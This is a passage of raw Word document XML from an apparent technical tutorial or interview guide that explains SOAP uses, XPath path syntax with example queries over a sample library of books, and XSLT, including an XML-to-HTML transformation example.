          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: SOAP is often used in older enterprise systems and in applications requiring strict data integrity and security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AE2D94"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itical Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you require features like ACID transactions or asynchronous messaging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D174F13"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F27D1">
          <v:rect id="_x0000_i1977" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52414A3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2DCA0B29"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78" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="185C011D" w14:textId="09447E7F" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00287771">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="417" w:name="_Toc197867631"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Path in XML</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="417"/>
    </w:p>
    <w:p w14:paraId="0D17B403" w14:textId="0D384AAE" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E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refers to a way to navigate or locate specific elements or attributes within an XML document. It allows you to specify the exact location of data or content within the document's hierarchy. The most </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">commonly used method for defining paths in XML is </w:t>
      </w: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 xml:space="preserve"> (XML Path Language), which provides a syntax for selecting nodes in an XML document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6161811F"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Points about Path in XML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A37EA4"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Path is a query language used for navigating an XML document and selecting nodes based on a specific path. An </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XPath expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> defines the path to an element, attribute, or text in an XML document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3E4780"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uctur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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2FA57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 refers to the title element inside the book element inside the library element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EB34EB"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and Relative Paths</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675A1D2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Path</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Starts from the root of the document. It begins with a forward slash (/). Example: /catalog/book/title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071D055D"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ative Path</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Starts from the current node. It does not begin with a forward slash. Example: book/title (relative to the current node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6369FE"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 Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E631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from the root node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510EA188"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nodes anywhere in the document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3957CD0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attributes of an element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786056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Used to filter nodes (e.g., selecting specific children or attributes based on conditions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EC4D0E"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Wildcard that matches any element node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E54D52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xample XPath Expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7781DC1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store/book/author - Selects all author elements under the book element in the bookstore root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE50432"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title - Selects all title elements inside any book element in the entire document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDEC1AA"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30]/title - Selects title elements from book elements in catalog where the price is greater than 30.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB865E2"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de Selection</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2961C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Path allows you to select various nodes such as elements, attributes, text, and comments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A97C3A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ou can also use XPath to filter or iterate through XML nodes based on specific criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B392998"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Document:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFD7CD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9AB2F0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738012C"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XML Basics&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A91E8D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7A9DB9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5&lt;/price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE03F9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8F4D41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378FB00"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s"&gt;Introducción a XML&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634212E1"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a Perez&lt;/author&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DB20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5&lt;/price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978A609"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4865B0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15FA28A"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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEB778D"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 specific element</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605639E2"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 Selects the title element inside the first book element under the catalog root element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F76EE3"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ll title elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D65E7DC"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 Selects all title elements in the entire document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097CC442"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based on attribute</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1281C995"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lang='en']: Selects the title element with the attribute lang="en" inside the book element in the catalog.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181F160C"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specific nodes based on condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9D97AF"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20]/title: Selects the title of the book where the price is greater than 20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D0FFCB" w14:textId="77777777" w:rsidR="004D65E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DBBEA48">
          <v:rect id="_x0000_i1979" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F20C40"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7BCCD69A"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80" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E2BA1" w14:textId="684ABC67" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="003850AC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="418" w:name="_Toc197867632"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Write a path for a given xml file</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="418"/>
    </w:p>
    <w:p w14:paraId="15F79BE2" w14:textId="39FA1351" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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Below is an example XML file, followed by various </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XPath paths</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be used to locate specific elements, attributes, or text within it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5723F029"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File:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C1448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496F2E56"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495168A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Introduction to XML&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5329304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6E2DEA8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Tech Books&lt;/publisher&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728C56D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0CEBC5A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3-01-15&lt;/publicationDate&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C09776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236499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7B1EEE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fr"&gt;XML pour débutants&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20273E4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e Dubois&lt;/author&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8E1220"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Éditions Open&lt;/publisher&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115A1CA9"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9&lt;/price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490A3A5D"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2-12-01&lt;/publicationDate&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286DD9C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9477E0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6BAC63B"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Advanced XML Programming&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2653B0A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3ACF41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Prog Books&lt;/publisher&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1D3F7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7618B71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4-03-10&lt;/publicationDate&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D348E5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444DCFE"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70DEEA1E"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AA9A22">
          <v:rect id="_x0000_i1981" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C865AE"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Paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF18386"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the first book</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684F982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508DD0C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first title element inside the first book element under the root library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8F9213"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author of the second book</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE3C1A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2]/author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A4E3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author of the second book element in the library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E830C8"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title elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A45274"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75FC1842"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side book elements under the root library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633BA05F"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rice of the book with lang="en"</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01845B38"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lang='en']/parent::book/price</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAC2CB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of the book where the title has an attribute lang="en".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D2DB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price values greater than 20</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310CA9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price&gt;20]/price</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363899E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element for books where the price is greater than 20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34763D92"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all books (irrespective of language)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3724C90E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1941EEB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 the entire document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116F80A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sher of the last book</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA84E67"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last()]/publisher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD4B24A"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This selects the publisher element of the last book element in the library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C897E0"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cationDate of the book by David Smith</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187741C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author='David Smith']/publicationDate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3223E54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ublicationDate of the book where the author is "David Smith".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261FE183"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7AD7F">
          <v:rect id="_x0000_i1982" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B16B6"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1A431FD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83" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41569FE7" w14:textId="162E0803" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00A56A4D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="419" w:name="_Toc197867633"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of XSLT</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="419"/>
    </w:p>
    <w:p w14:paraId="6578C1DD" w14:textId="3D43847D" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9"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LT (Extensible Stylesheet Language Transformations)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Uses of XSLT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8DB68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HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: XSLT allows you to transform XML data into a format that can be rendered by a web browser, typically HTML. This is particularly useful for displaying dynamic data on websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA0947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XML data into a user-friendly HTML table or list for display in a web page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B7165"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Other XML Formats</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: XSLT can be used to convert XML documents from one structure to another. This is useful when different systems or applications need to exchange data but require different XML formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9E7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anging the structure of an XML document to match a different schema or to prepare data for integration with another application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5174B204"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Filtering and Extraction</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: XSLT can be used to filter and extract specific data from XML files. You can select specific nodes, attributes, or values using XPath expressions and transform the data accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DE21A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xtracting only specific information from an XML document, such as all the authors from a list of books, and outputting it into another format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD506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Data Presentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: XSLT can be used to apply formatting or structure to the XML data for human readability. This is done by transforming XML data into HTML or plain text, making it more suitable for presentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C2E96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an XML file containing product information into a well-formatted HTML page that can be displayed to users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8191D3"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Data and Presentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Reusing the same XML data in various presentations (e.g., showing a list of books in HTML, generating a PDF report, or exporting it to CSV).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AB0FC1"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eating Reports</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: XSLT can be used to format XML data for reports. It allows you to apply templates to XML data and format it into structured reports, such as tables, charts, or text documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5888314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reating a summary report from an XML file containing employee data, and transforming it into a well-organized HTML or PDF report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD88780"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to HTML Transformation with XSLT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3379B"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ML Input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0903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0AE20A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CABA05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Introduction to XML&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3298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531216A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77FB297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9732B5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252E34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Advanced XML Programming&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E4FA1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B5A6CF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571407B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3677ECC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31C3D2E8"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lastRenderedPageBreak/>
        <w:t>XSLT Stylesheet to Convert XML to HTML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407ED9B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5D73D7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 version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4029453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output method="html" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A50D54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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A12C228"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 match="/library"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAF6FA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115BC59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08B917B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FCF8EB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8A3B88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EB2B5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67EBBFE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5A2E5D2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3FB7B51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5AC42F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 select="book"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C91323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293FCB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title" /&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F60B3D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author" /&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDF11F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price" /&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C0538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7850F0A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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D209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6249213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2A8D2B2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04BE4D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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B0979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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B394FA"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Output (HTML):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C672B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D0E60F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6BABEE4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DE1EDB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F6A6FE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5407F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1FC2BC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0CC5E9D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1FA9B70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4CE0398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0CA92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Introduction to XML&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC2B36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John Doe&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61688B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29.99&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BC595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EBBF5B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CD12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Advanced XML Programming&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654492C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David Smith&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C0B97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49.95&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0697A86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3253F2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46F4A80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32DF5E8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E3B2CAD"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XSLT Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2DC06F"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lexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
